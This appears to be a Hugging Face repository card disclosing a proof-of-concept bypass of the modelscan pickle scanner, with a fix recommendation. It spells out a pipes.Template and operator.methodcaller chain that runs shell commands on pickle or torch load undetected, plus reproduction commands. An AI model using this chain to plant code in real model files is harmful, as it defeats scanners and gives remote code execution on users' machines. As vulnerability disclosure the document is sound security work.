You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

modelscan Bypass PoC: pipes.Template()

Vulnerability

modelscan 0.7.6 fails to detect malicious pickle files that use pipes.Template() for shell command execution. The pipes module is a Python stdlib module for shell pipeline construction, and is not included in modelscan's unsafe_globals blocklist.

Attack Chain

pipes.Template() — creates a shell pipeline template
operator.methodcaller("append", cmd, "--")(template) — adds arbitrary shell command
operator.methodcaller("open", "/dev/null", "w")(template) — opens the pipeline
operator.methodcaller("close")(fh) — triggers pipeline execution, running the shell command

Impact

Full RCE via pickle.load() or torch.load()
Bypasses modelscan 0.7.6 completely — reports "No issues found"
Uses only stdlib modules (pipes, operator.methodcaller)
pipes module internally calls os.popen() but the blocklist only checks top-level module references in pickle opcodes

Reproduction

python create_poc.py
modelscan scan -p pytorch_model.bin
# Output: "No issues found"

python -c "import pickle; pickle.loads(open('pytorch_model.bin','rb').read())"
# Creates /tmp/pipes_bypass_proof

Root Cause

modelscan checks pickle GLOBAL/STACK_GLOBAL opcodes against a blocklist of module+function pairs. pipes.Template is not in the blocklist. The fact that pipes.Template.open() internally delegates to os.popen() is invisible to the scanner because the call happens at Python runtime, not in the pickle bytecode.

Fix Recommendation

Add "pipes": "*" to unsafe_globals.CRITICAL in modelscan/settings.py.

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support